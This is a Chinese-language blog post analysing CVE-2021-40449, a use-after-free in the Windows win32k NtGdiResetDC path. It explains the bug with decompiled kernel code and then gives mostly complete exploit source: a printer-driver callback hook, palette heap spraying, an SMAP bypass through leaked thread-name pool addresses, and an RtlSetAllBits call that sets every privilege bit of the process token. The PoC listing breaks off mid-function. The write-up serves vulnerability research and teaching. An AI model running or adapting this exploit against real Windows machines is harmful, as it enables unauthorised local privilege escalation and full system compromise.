小小林熬夜学编程

这个屌丝很懒，什么也没留下！

热门标签

CVE-2021-40449 分析

作者：小小林熬夜学编程 | 2024-05-06 13:45:23

踩

cve-2021-40449

前言

该漏洞本身原理比较简单，而作为 Win10下的利用才是本篇文章的研究重点。

1.漏洞简介

1.1.漏洞描述

win32kfull.sys中的 $\textcolor{cornflowerblue}{NtGdiResetDC}$ 函数存在 UAF漏洞，攻击者可以利用该漏洞进行本地权限提升。

1.2.影响版本

windows_10
windows_10 20h2
windows_10 21h1
windows_10 1607
windows_10 1809
windows_10 1909
windows_10 2004
windows_11
windows_7 - sp1
windows_8.1 
windows_rt_8.1
windows_server 20h2
windows_server 2004
windows_server_2008 - sp2
windows_server_2008 r2
windows_server_2012
windows_server_2012 r2
windows_server_2016
windows_server_2019
windows_server_2022
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

1.3.危害等级

7.8 | 高危

2.漏洞分析

2.1.漏洞起因

用户层通过调用函数 $\textcolor{cornflowerblue}{ResetDC}$ ，进入到内核层 $\textcolor{cornflowerblue}{NtGdiResetDC}$ -> $\textcolor{cornflowerblue}{GreResetDCInternal}$ ，主要漏洞点：

__int64 __usercall GreResetDCInternal@<rax>(HDC hdc@<rcx>, __int64 pdmw@<rdx>, int *a3@<r8>)
{
 	...			
    hdc_1 = hdc;
 	DCOBJ::DCOBJ((DCOBJ *)&dcobj, hdc);
	dcobj_1 = dcobj;
    ...
    pdevob = *(_QWORD *)(dcobj_1 + 0x30); // 从旧的DC对象中获取dev
    if ( *(_DWORD *)(pdevob + 0x20) == 1 )
    {
      // 创建新的DC
      hdcNew = (HDC)hdcOpenDCW(&qword_1C0141EB0, pdmw_1, 0i64, 0i64, *(_QWORD *)(pdevob + 0xA18));
      hdcNew_1 = hdcNew;
      if ( hdcNew )
      {
        *(_QWORD *)(pdevob + 0xA18) = 0i64;
        DCOBJ::DCOBJ((DCOBJ *)&dco, hdcNew);
        v14 = (_QWORD *)dco;
        if ( dco )
        {
          if ( v12 )
            *(_DWORD *)(dco + 0x78) = *(_DWORD *)(dco + 0x74);
          v14[308] = *(_QWORD *)(dcobj + 0x9A0);
          *(_QWORD *)(dcobj + 0x9A0) = 0i64;
          v14[309] = *(_QWORD *)(dcobj + 0x9A8);
          *(_QWORD *)(dcobj + 0x9A8) = 0i64;
          v15 = *(void (__fastcall **)(_QWORD, _QWORD))(pdevob + 0xAD0);// 函数是 UMPDDrvResetPDEV
          if ( v15 )
            v15(*(_QWORD *)(pdevob + 0x720), *(_QWORD *)(v14[6] + 0x720i64));// 函数调用
          GreAcquireHmgrSemaphore();
          LOBYTE(v23) = 1;
          HmgSwapLockedHandleContents(hdc_1, 0i64, hdcNew_1, 0i64, v23);// 交换新旧DC句柄内容
          GreReleaseHmgrSemaphore();
          v7 = 1;
        }
        else
        {
          EngSetLastError((unsigned int)(dco + 6));
        }
        XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dco);
      }
    }
    ...
LABEL_21:
  XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dcobj);// 解锁旧的 dc对象
  if ( v7 )
  {
    bDeleteDCInternal(hdcNew_1, 1i64, 0i64); // 由于之前已经交换了句柄，所以这里释放的是旧的DC
    DCOBJ::DCOBJ((DCOBJ *)&dcobj, hdc_1);	
    v16 = dcobj;
    if ( !dcobj )
    {
      EngSetLastError((unsigned int)(dcobj + 6));
LABEL_24:
      v7 = 0;
LABEL_38:
      XDCOBJ::vUnlockNoNullSet((XDCOBJ *)&dcobj);// 解锁新的 DC对象
      return v7;
    }
    ...
  }
  ...
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

line:11 $\textcolor{cornflowerblue}{hdcOpenDCW}$ 函数内部会调用一个位于用户层的回调 $\textcolor{cornflowerblue}{DrvEnablePDEV}$ ，具体调用链：
- $\textcolor{cornflowerblue}{hdcOpenDCW }$ -> $\textcolor{cornflowerblue}{PDEVOBJ::PDEVOBJ}$ -> $\textcolor{cornflowerblue}{PDEVOBJ::EnablePDEV}$ -> $\textcolor{cornflowerblue}{DrvEnablePDEV}$
line:25 从旧的 dev对象中获取函数指针，正常情况下该指针指向的是 $\textcolor{cornflowerblue}{UMPDDrvResetPDEV}$ ，应该是重置 DEV设备对象。
line:45 从这里开始将释放旧的 DC

从以上分析中可以看出一个问题，因为函数 $\textcolor{cornflowerblue}{hdcOpenDCW}$ 会调用用户层的一个回调函数，所以 DC对象可能易受破坏。函数 $\textcolor{cornflowerblue}{GreResetDCInternal}$ 后面会解锁并释放旧的 DC对象。于是，攻击者可以通过 HOOK用户层中相应的回调函数，再次调用 $\textcolor{cornflowerblue}{ResetDC}$ 同一个 DC句柄，这就使得内核重新调用函数 $\textcolor{cornflowerblue}{GreResetDCInternal}$ ，但由于旧的 DC对象已经被释放，而 line:25仍是从旧的 dev对象中获取函数指针，并在 line:29 尝试调用，所以这是一个典型的 UAF漏洞。

3.漏洞利用

3.1.利用流程

在这里插入图片描述

总体利用流程如上图所示。首先在应用层 HOOK函数 $\textcolor{cornflowerblue}{DrvEnablePDEV}$ ，然后创建一个全局打印机的 DC句柄 hdc，然后 $\textcolor{orange}{ResetDC(hdc)}$ ，使内核执行函数 $\textcolor{cornflowerblue}{GreResetDCInternal}$ ，并在其回调的过程中再次 $\textcolor{orange}{ResetDC(hdc)}$ ，使得内核释放打印机的DC对象。利用 Palettes占位被释放掉的 DC对象中 DEV对象的内存，并伪造 DEV的 $\textcolor{cornflowerblue}{UMPDDrvResetPDEV}$ 函数指针和参数，最终获得一个有限的（只限于接受一个参数，因为另一个参数不可控）任意内核函数调用的原语。 POC使用任意内核函数调用原语调用函数 $\textcolor{cornflowerblue}{RtlSetAllBits}$ 修改 Token的权限实现提权。

$\textcolor{green}{下面将对利用流程中的重点进行分析}$

3.2.堆喷

3.2.1.利用调色板堆喷的前置知识

系统调色板（Palette）在堆喷中是比较常用到的，用户层调用函数 $\textcolor{cornflowerblue}{CreatePalette}$ 对应的内核服务：

signed __int64 __fastcall NtGdiCreatePaletteInternal(char *a1, unsigned int palNumEntries){
    ...
    if ( *(_WORD *)a1 != 0x300 || !palNumEntries ) 		// palNumEntries 来自应用层
        											// CreatePalette(LOGPALETTE* lPalette)的
        							  				 // lPalette->palNumEntries
        											// 校验lPalette->palVersion 和 lPalette->palNumEntries;
        v2 = 0i64;
    if ( v2 )
  	{
        ...
    	PALMEMOBJ::bCreatePalette(&v5, 1i64, size);
        ...
    }
    ...
}
//

__int64 __fastcall PALMEMOBJ::bCreatePalette(PALMEMOBJ *this, int a2, unsigned int size, unsigned int *a4, unsigned int a5, unsigned int a6, unsigned int a7, unsigned int a8)
{
    ...
    if ( a2 == 1 )
    {
        size = 4 * palNumEntries + 0x90;  				// 调色板对象实际要分配的大小计算方式， 								  			
        v12 = a8 & 0x102F00;
        if ( !palNumEntries )
            return 0i64;
        goto LABEL_11;
    }  
    ...
LABEL_11:
  obj = AllocateObject(size, 8, 0);					   // 分配一个size大小的对象，属于LookasideList管理的分页池的内存
  v14 = (struct _BASEOBJECT *)obj;
  *(_QWORD *)v10 = obj;
  if ( obj )
  {
    ...
    ColorTabl = *(unsigned int **)(*(_QWORD *)v10 + 0x78i64);
    color = v26;											// data来自lPalette->palPalEntry
    if ( v26 )
    {
        for ( i = 0; i < palNumEntries_1; ++i )			  // 向调色板的色彩板中填充颜色
        {
            v23 = *color;
            ++color;
            *ColorTabl = v23;
            ++ColorTabl;
        }
    }
   ...
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50

可见调色板的大小和色彩都是可控的，因此可以用来进行堆喷的同时控制内存的数据。但要注意调色板所在内存的类型 @line:31，不是同类型的内存无法使用这种方式去堆喷。

一般用法：

void SprayPalettes(DWORD size){
    WORD palNumEntries = (size-0x90)/4;
    DWORD palSize = sizeof(LOGPALETTE) + (palNumEntries-1)*sizeof(PALETTEENTRY);
    LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize);
    
    PBYTE Color = (PBYTE)Palette+4;
    /*根据你的需要设置Color的内存*/
    lPalette->palNumEntries=palNumEntries;
    lPalette->palVersion=0x300;
    // 根据实际情况可进行若干次如下的操作
    CreatePalette(lPalette);
}
1
2
3
4
5
6
7
8
9
10
11
12

3.2.2.利用调色板占位DC对象内存

首先查看 DEV对象所占的内存大小

在这里插入图片描述

所占内存大小是 0xE30（ $\textcolor{orange}{sizeof(DEVOBJ)+sizeof(POOL\_HEADER)}$ ）。

调用 $\textcolor{orange}{SprayPalettes(0xE20)}$ 进行堆喷。

void SprayPalettes(DWORD size) {
	DWORD palCount = (size - 0x90) / 4;
	DWORD palSize = sizeof(LOGPALETTE) + (palCount - 1) * sizeof(PALETTEENTRY);
	LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize);

	if (lPalette == NULL) {
		printf("[Error_%d] SprayPalettes(): Insufficient system resource.\n", __LINE__);
		return;
	}
	
	// lPalette->PaletteEntry
	PCHAR Fake = (PCHAR)lPalette+4;

	// Fake BitmapHeader，不同版本系统需要根据调试做出微调
	ULONG64 BitmapHeader = FakeBitmapHeader() - 1 + 0x10;
	printf("[+] FakeBitmapHeader = %p\n", BitmapHeader);

	/*
		1607:
		*(pdc+0x720) = BitmapHeader
		*(pdc+0xAD0) = RtlSetAllBits
	*/
	((PULONG64)Fake)[0xD7] = BitmapHeader;
	((PULONG64)Fake)[0x14D] = g::RtlSetAllBitsAddress;

	lPalette->palNumEntries = (WORD)palCount;
	lPalette->palVersion = 0x300;

	for(int i=0;i<0x1000;i++)
		CreatePalette(lPalette);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

3.3.使用函数RtlSetAllBits修改Token的权限

3.3.1.RtlSetAllBits分析

NTSYSAPI VOID RtlSetAllBits(
  [in] PRTL_BITMAP BitMapHeader			// 指向描述位图的 RTL_BITMAP 结构的指针。 此结构必须已由 RtlInitializeBitMap 例程初始化。
);
1
2
3

函数要求一个 PRTL_BITMAP结构的参数，该函数内部实现：

void __stdcall RtlSetAllBits(PRTL_BITMAP BitMapHeader)
{
  unsigned int *v1; // r8
  unsigned __int64 size; // r9

  v1 = BitMapHeader->Buffer;
  // size相当于是BitMapHeader->SizeOfBitMap 以2为底的对数减1，向下取整的结果
  size = (unsigned __int64)(4 * (((BitMapHeader->SizeOfBitMap & 0x1F) != 0) + (BitMapHeader->SizeOfBitMap >> 5))) >> 2;
  if ( size )
  {
    if ( (unsigned __int8)v1 & 4 )
    {
      *v1 = -1;
      if ( !--size )
        return;
      ++v1;
    }
    memset(v1, 0xFFu, 8 * (size >> 1));
    if ( size & 1 )
      v1[size - 1] = -1;
  }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

瞧，这个函数是多么令人感到惊喜，因为它会将目标内存写入 $\textcolor{orange}{8*(size/2)}$ 个 0xFF，这要是目标内存为 $\textcolor{orange}{Token->Privilege}$ ，足以使对应的进程获得所有权限！

3.3.2.绕过SMAP伪造PRTL_BITMAP

在 Win8及其之后的系统开启了 SMAP，意味着内核无法直接访问用户态空间下的数据，所以不能直接用位于用户空间的PRTL_BITMAP作为 $\textcolor{cornflowerblue}{RtlSetAllBits}$ 的参数。

前辈给出了一种新的方式——利用函数 $\textcolor{cornflowerblue}{NtSetInformationThread}$ 为一个线程设置名字，该线程的名字会被保存在内核池中，我们将线程名构造成PRTL_BITMAP，自然也就位于内核池中。通过函数 $\textcolor{cornflowerblue}{ZwQuerySystemInformation}$ 泄露内核池地址，我们将得到PRTL_BITMAP的具体位置，这样就绕过了 SMAP。

static DWORD WINAPI  LeakDemoThread(LPVOID lParam) {
	while (TRUE) {
		Sleep(0x1000 * 60 * 60 * 24 * 365);
	}
	return 0;
}

ULONG64 FakeBitmapHeader() {
	HANDLE hThread = INVALID_HANDLE_VALUE;
	DWORD dwThreadID;
	DWORD dwSize = 0x1000;
	PVOID payload = NULL;
	// 创建一个线程并立即挂起
	hThread = CreateThread(NULL, 0, LeakDemoThread, NULL, CREATE_SUSPENDED, &dwThreadID);
	if (hThread == INVALID_HANDLE_VALUE) {
		printf("[Error_%d] CreateThread failed.\n", __LINE__);
		exit(0);
	}

	payload = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
	
	// BitmapHeader->Size
	*(PULONG64)payload = 0x40;
	// BitmapHeader->Buffer
	*(PULONG64)((ULONG64)payload + 8) = GetToken()+0x48;

	UNICODE_STRING uzString;
	uzString.Buffer = (PWCHAR)payload;
	uzString.Length = dwSize;
	uzString.MaximumLength = 0xffff;

	// 将伪造的BitMapHeader结构设置到线程名中，使其位于内核池中，以绕过SMAP保护
	NTSTATUS ntst = g::NtSetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &uzString, sizeof(uzString));
	if (ntst != 0) {
		printf("[Error_%d] NtSetInformationThread failed.n", __LINE__);
		exit(0);
	}

	// 泄露线程名的地址
	dwSize = 0x400*0x400;
	DWORD dwRetSize;

	PSYSTEM_BIGPOOL_INFORMATION SysPoolInfo =
		(PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, dwSize);

	ntst = g::ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, SysPoolInfo, dwSize, &dwRetSize);
	if (ntst != 0) {
		printf("[Error_%d] ZwQuerySystemInformation failed.\n", __LINE__);
		exit(0);
	}

	DWORD DesireSize = uzString.Length + sizeof(uzString);

	for (DWORD i = 0; i < SysPoolInfo->Count; i++) {
		if (!strncmp((char*)SysPoolInfo->AllocatedInfo[i].Tag, "ThNm", 4) &&
			SysPoolInfo->AllocatedInfo[i].SizeInBytes == DesireSize)
		{
			return (ULONG64)SysPoolInfo->AllocatedInfo[i].VirtualAddress;
		}
	}
	return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62

4.复现

4.1.POC

#include<windows.h>
#include<winddi.h>
#include<winspool.h>
#include <winternl.h>
#include <stdio.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib ")

#define STATUS_INFO_LENGTH_MISMATCH  ((NTSTATUS)0xC0000004L) 

#define ThreadNameInformation 0x26
#define SystemExtendedHandleInformation  64
#define SystemBigPoolInformation 66

using ZwQuerySystemInformation_t = NTSTATUS(*)(
	SYSTEM_INFORMATION_CLASS SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength);

using NtSetInformationThread_t = NTSTATUS(*)(
	HANDLE threadHandle,
	THREADINFOCLASS threadInformationClass,
	PVOID threadInformation,
	ULONG threadInformationLength);


using DrvEnableDriver_t = BOOL(*)(ULONG iEngineVersion, ULONG cj, DRVENABLEDATA* pded);

using DrvEnablePDEV_t = DHPDEV(*)(DEVMODEW* pdm,
	LPWSTR pwszLogAddress,
	ULONG cPat,
	HSURF* phsurfPatterns,
	ULONG cjCaps,
	ULONG* pdevcaps,
	ULONG cjDevInfo,
	DEVINFO* pdi,
	HDEV hdev,
	LPWSTR pwszDeviceName,
	HANDLE hDriver);

using DrvEnablePDEV_t = DHPDEV(*)(DEVMODEW* pdm,
LPWSTR pwszLogAddress,
ULONG cPat,
HSURF* phsurfPatterns,
ULONG cjCaps,
ULONG* pdevcaps,
ULONG cjDevInfo,
DEVINFO* pdi,
HDEV hdev,
LPWSTR pwszDeviceName,
HANDLE hDriver);

using DrvDisableDriver_t = void(*)();

typedef struct _SYSTEM_BIGPOOL_ENTRY
{
	union
	{
		PVOID VirtualAddress;
		ULONG_PTR NonPaged : 1;     // Set to 1 if entry is nonpaged.
	};
	SIZE_T SizeInBytes;
	union
	{
		UCHAR Tag[4];
		ULONG TagUlong;
	};
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;

typedef struct _SYSTEM_BIGPOOL_INFORMATION
{
	ULONG Count;
	SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;

typedef struct _SYSTEM_HANDLE
{
	PVOID Object;
	HANDLE UniqueProcessId;
	HANDLE HandleValue;
	ULONG GrantedAccess;
	USHORT CreatorBackTraceIndex;
	USHORT ObjectTypeIndex;
	ULONG HandleAttributes;
	ULONG Reserved;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
	ULONG_PTR HandleCount;
	ULONG_PTR Reserved;
	SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;



namespace g {
	DrvEnablePDEV_t OldDrvEnablePDEV = 0;
	DrvEnableDriver_t DrvEnableDriver = 0;
	DrvDisableDriver_t DrvDisableDriver = 0;
	ZwQuerySystemInformation_t ZwQuerySystemInformation = 0;
	NtSetInformationThread_t NtSetInformationThread = 0;
	ULONG64 RtlSetAllBitsAddress = 0;
	PCHAR szKernelName = NULL;
	PCHAR szPrinterName = NULL;
	HANDLE hToken=INVALID_HANDLE_VALUE;
	ULONG64 KernelBase = 0;
	bool bIsTrigger = false;
	HDC hdc = 0;
};

void Hook_DrvEnablePDEV();
ULONG64 GetKernelBase();
bool Init();
ULONG64 GetToken();
DHPDEV DrvEnablePDEV_Proxy(
	DEVMODEW* pdm,
	LPWSTR   pwszLogAddress,
	ULONG    cPat,
	HSURF* phsurfPatterns,
	ULONG    cjCaps,
	ULONG* pdevcaps,
	ULONG    cjDevInfo,
	DEVINFO* pdi,
	HDEV     hdev,
	LPWSTR   pwszDeviceName,
	HANDLE   hDriver);
void Hook_DrvEnablePDEV();
static DWORD WINAPI  LeakDemoThread(LPVOID lParam);
ULONG64 FakeBitmapHeader();
void SprayPalettes(DWORD size);
bool CheckPrivilege(HANDLE TokenHandle);
DWORD getProcessId(const char* name);
void SpawnShell();

ULONG64 GetKernelBase() {
	DWORD cReturn=0;
	char szDevName[MAX_PATH] = { 0 };
	ULONG64 KernelBase = 0;

	EnumDeviceDrivers(NULL, 0, &cReturn);
	if (cReturn <= 0) {
		printf("[Error_%d] GetKernelBase(): EnumDeviceDrivers failed.\n", __LINE__);
		exit(-1);
	}

	PULONG64 DevList = (PULONG64)GlobalAlloc(GMEM_ZEROINIT, cReturn);
	if (DevList == NULL) {
		printf("[Error_%d] GetKernelBase(): Insufficient system resource.\n", __LINE__);
		exit(-1);
	}

	if (!EnumDeviceDrivers((LPVOID*)DevList, cReturn, &cReturn)) {
		printf("[Error_%d] GetKernelBase(): EnumDeviceDrivers failed.\n", __LINE__);
		exit(-1);
	}

	for (DWORD i = 0; i < cReturn / sizeof(DevList[0]); i++)
	{
		if (GetDeviceDriverBaseNameA((LPVOID)DevList[i], szDevName, MAX_PATH)) {
			char* LowerName = _strlwr(szDevName);
			if (!strncmp(LowerName, "nt",2)) {
				KernelBase = DevList[i];
				g::szKernelName = strdup(szDevName);
				break;
			}
		}
	}
	free(DevList);
	return KernelBase;
}

bool Init() {
	HMODULE hNt = LoadLibraryA("ntdll");
	if (hNt == NULL) {
		printf("[Error_%d] Init(): Can't find ntdll.",__LINE__);
		return FALSE;
	}
	g::ZwQuerySystemInformation = (ZwQuerySystemInformation_t)GetProcAddress(hNt, "NtQuerySystemInformation");
	g::NtSetInformationThread = (NtSetInformationThread_t)GetProcAddress(hNt, "NtSetInformationThread");
	if (g::NtSetInformationThread == NULL || g::ZwQuerySystemInformation == NULL) {
		printf("[Error_%d] Init(): Can't find target func.\n", __LINE__);
		return FALSE;
	}
	 g::KernelBase = GetKernelBase();

	 HMODULE hKernel = LoadLibraryA(g::szKernelName);

	 if (hKernel == NULL) {
		 printf("[Error_%d] Init(): Can't find %s.", __LINE__, g::szKernelName);
		 return FALSE;
	 }

	 ULONG64 RtlSetAllBitsProc = (ULONG64)GetProcAddress(hKernel, "RtlSetAllBits");
	 if (RtlSetAllBitsProc==0) {
		 printf("[Error_%d] Init(): Can't find target func.\n", __LINE__);
		 return FALSE;
	 }

	g::RtlSetAllBitsAddress = RtlSetAllBitsProc - (ULONG64)hKernel + g::KernelBase;
	printf("[+] Found RtlSetAllBitsAddress = %p\n", g::RtlSetAllBitsAddress);

	return TRUE;
}

ULONG64 GetToken() {
	PSYSTEM_HANDLE_INFORMATION_EX sys_handle_info_ref = NULL;
	ULONG64 Token = 0;
	ULONG len = 20;
	NTSTATUS ntst = 0;

	OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &g::hToken);
	if (g::hToken == INVALID_HANDLE_VALUE) {
		printf("[Error_%d] GetToken(): OpenProcessToken failed.\n", __LINE__);
		return 0;
	}
	//获取本进程的EPROCESS
	do {
		len *= 2;
		sys_handle_info_ref = (PSYSTEM_HANDLE_INFORMATION_EX)realloc(sys_handle_info_ref, len);
		ntst = g::ZwQuerySystemInformation(
			(SYSTEM_INFORMATION_CLASS)SystemExtendedHandleInformation, sys_handle_info_ref, len, &len);
	} while (ntst == STATUS_INFO_LENGTH_MISMATCH);

	if (ntst != 0) {
		printf("[Error_%d] GetToken(): ZwQuerySystemInformation failed.\n", __LINE__);
		if (sys_handle_info_ref)
			free(sys_handle_info_ref);
		return 0;
	}

	DWORD pid = GetCurrentProcessId();
	for (int i = 0; i < sys_handle_info_ref->HandleCount; i++) {
		if (g::hToken == sys_handle_info_ref->Handles[i].HandleValue
			&& (HANDLE)pid == sys_handle_info_ref->Handles[i].UniqueProcessId) {
			Token = (ULONG64)sys_handle_info_ref->Handles[i].Object;
			break;
		}
	}

	if (sys_handle_info_ref)
		free(sys_handle_info_ref);

	printf("[+] Found current process token = %p\n",Token);
	return Token;
}

DHPDEV DrvEnablePDEV_Proxy(
	DEVMODEW* pdm,
	LPWSTR   pwszLogAddress,
	ULONG    cPat,
	HSURF* phsurfPatterns,
	ULONG    cjCaps,
	ULONG* pdevcaps,
	ULONG    cjDevInfo,
	DEVINFO* pdi,
	HDEV     hdev,
	LPWSTR   pwszDeviceName,
	HANDLE   hDriver) {

	DHPDEV res;

	printf("[+] DrvEnablePDEV_Proxy called.\n");
	res = g::OldDrvEnablePDEV(pdm, pwszLogAddress, cPat, phsurfPatterns, cjCaps, pdevcaps, cjDevInfo, pdi, hdev, pwszDeviceName, hDriver);
	if (g::bIsTrigger) {
		// 释放hdc
		g::bIsTrigger = FALSE;
		ResetDC(g::hdc, NULL);
		// UAF
		SprayPalettes(0xE20);
	}
	return res;
}

void Hook_DrvEnablePDEV() {
	DWORD cbBuf = 0;
	DWORD cbNeed,cReturned;
	PPRINTER_INFO_4 PrintInfo=NULL;
	DRVENABLEDATA DrvData;
	DWORD OldProtect;
	HANDLE hPrinter = INVALID_HANDLE_VALUE;

	//首先枚举本地安装的打印机，找到可用的
	EnumPrintersA(PRINTER_ENUM_LOCAL, NULL, 4, NULL, 0, &cbNeed, &cReturned);
	if (cbNeed <= 0) {
		printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find available printer.\n", __LINE__);
		exit(-1);
	}
	PrintInfo = (PPRINTER_INFO_4)GlobalAlloc(GMEM_ZEROINIT, cbNeed);
	if (PrintInfo == NULL) {
		printf("[Error_%d] Hook_DrvEnablePDEV(): Insufficient system resource.\n", __LINE__);
		exit(-1);
	}
	if (!EnumPrintersA(PRINTER_ENUM_LOCAL, NULL, 4, (PBYTE)PrintInfo, cbNeed, &cbNeed, &cReturned)
		|| cReturned<=0) {
		printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find available printer.\n", __LINE__);
		exit(-1);
	}
	
	// 循环查找打印机
	for (DWORD i = 0; i < cReturned; i++) {
		if (!OpenPrinterA(PrintInfo[i].pPrinterName, &hPrinter, NULL)) {
			printf("[Error_%d] Hook_DrvEnablePDEV(): OpenPrinterA failed.\n", __LINE__);
			continue;
		}
		else {
			printf("[+] Using a available printer: %s.\n", PrintInfo[i].pPrinterName);
			g::szPrinterName = strdup(PrintInfo[i].pPrinterName);
			
			// 获取打印机驱动文件名
			GetPrinterDriverA(hPrinter, NULL, 2, NULL, NULL, &cReturned);
			if (cReturned <= 0) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): GetPrinterDriverA failed.\n", __LINE__);
				continue;
			}
			PDRIVER_INFO_2 DrvInfo = (PDRIVER_INFO_2)GlobalAlloc(GMEM_ZEROINIT, cReturned);
			if (DrvInfo == NULL) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): Insufficient system resource.\n", __LINE__);
				continue;
			}

			if (!GetPrinterDriverA(hPrinter, NULL, 2, (PBYTE)DrvInfo, cReturned, &cReturned) ||
				cReturned <= 0) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): GetPrinterDriverA failed.\n", __LINE__);
				continue;
			}

			HMODULE hPrinterDrv = LoadLibraryExA(DrvInfo->pDriverPath, NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
			if (hPrinterDrv == NULL) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): LoadLibraryExA failed.\n", __LINE__);
				continue;
			}

			g::DrvEnableDriver = (DrvEnableDriver_t)GetProcAddress(hPrinterDrv, "DrvEnableDriver");
			g::DrvDisableDriver = (DrvDisableDriver_t)GetProcAddress(hPrinterDrv, "DrvDisableDriver");
			if (g::DrvEnableDriver == NULL || g::DrvDisableDriver == NULL) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): Can't find target functions .\n", __LINE__);
				continue;
			}
			// 打开图形驱动，获取回调函数列表，里面有我们要HOOK的函数
			if (!g::DrvEnableDriver(DDI_DRIVER_VERSION_NT4, sizeof(DRVENABLEDATA), &DrvData)) {
				printf("[Error_%d] Hook_DrvEnablePDEV(): DrvEnableDriver failed.\n", __LINE__);
				continue;
			}

			if (!VirtualProtect(DrvData.pdrvfn, DrvData.c * sizeof(PFN), PAGE_READWRITE, &OldProtect))
			{
				printf("[Error_%d] Hook_DrvEnablePDEV(): VirtualProtect failed.\n", __LINE__);
				continue;
			}

			for (DWORD i = 0; i < DrvData.c; i++) {
				if (DrvData.pdrvfn[i].iFunc == INDEX_DrvEnablePDEV) {
					// 保存并HOOK
					g::OldDrvEnablePDEV = (DrvEnablePDEV_t)DrvData.pdrvfn[i].pfn;
					DrvData.pdrvfn[i].pfn = (PFN)DrvEnablePDEV_Proxy;
					break;
				}
			}
		}
		// 关闭图形驱动
		g::DrvDisableDriver();
		VirtualProtect(DrvData.pdrvfn, DrvData.c * sizeof(PFN), OldProtect, &OldProtect);

		return;
	}
	
}

static DWORD WINAPI  LeakDemoThread(LPVOID lParam) {
	while (TRUE) {
		Sleep(0x1000 * 60 * 60 * 24 * 365);
	}
	return 0;
}

ULONG64 FakeBitmapHeader() {
	HANDLE hThread = INVALID_HANDLE_VALUE;
	DWORD dwThreadID;
	DWORD dwSize = 0x1000;
	PVOID payload = NULL;

	hThread = CreateThread(NULL, 0, LeakDemoThread, NULL, CREATE_SUSPENDED, &dwThreadID);
	if (hThread == INVALID_HANDLE_VALUE) {
		printf("[Error_%d] CreateThread failed.\n", __LINE__);
		exit(0);
	}

	payload = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
	
	// BitmapHeader->Size
	*(PULONG64)payload = 0x40;
	// BitmapHeader->Buffer
	*(PULONG64)((ULONG64)payload + 8) = GetToken()+0x48;

	UNICODE_STRING uzString;
	uzString.Buffer = (PWCHAR)payload;
	uzString.Length = dwSize;
	uzString.MaximumLength = 0xffff;

	// 将伪造的BitMapHeader结构设置到线程名中，使其位于内核池中，以绕过SMAP保护
	NTSTATUS ntst = g::NtSetInformationThread(hThread, (THREADINFOCLASS)ThreadNameInformation, &uzString, sizeof(uzString));
	if (ntst != 0) {
		printf("[Error_%d] NtSetInformationThread failed.\n", __LINE__);
		exit(0);
	}

	// 泄露线程名的地址
	dwSize = 0x400*0x400;
	DWORD dwRetSize;

	PSYSTEM_BIGPOOL_INFORMATION SysPoolInfo =
		(PSYSTEM_BIGPOOL_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, dwSize);

	ntst = g::ZwQuerySystemInformation((SYSTEM_INFORMATION_CLASS)SystemBigPoolInformation, SysPoolInfo, dwSize, &dwRetSize);
	if (ntst != 0) {
		printf("[Error_%d] ZwQuerySystemInformation failed.\n", __LINE__);
		exit(0);
	}

	DWORD DesireSize = uzString.Length + sizeof(uzString);

	for (DWORD i = 0; i < SysPoolInfo->Count; i++) {
		if (!strncmp((char*)SysPoolInfo->AllocatedInfo[i].Tag, "ThNm", 4) &&
			SysPoolInfo->AllocatedInfo[i].SizeInBytes == DesireSize)
		{
			return (ULONG64)SysPoolInfo->AllocatedInfo[i].VirtualAddress;
		}
	}
	return 0;
}

void SprayPalettes(DWORD size) {
	DWORD palCount = (size - 0x90) / 4;
	DWORD palSize = sizeof(LOGPALETTE) + (palCount - 1) * sizeof(PALETTEENTRY);
	LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize);

	if (lPalette == NULL) {
		printf("[Error_%d] SprayPalettes(): Insufficient system resource.\n", __LINE__);
		return;
	}
	
	// lPalette->PaletteEntry
	PCHAR Fake = (PCHAR)lPalette+4;

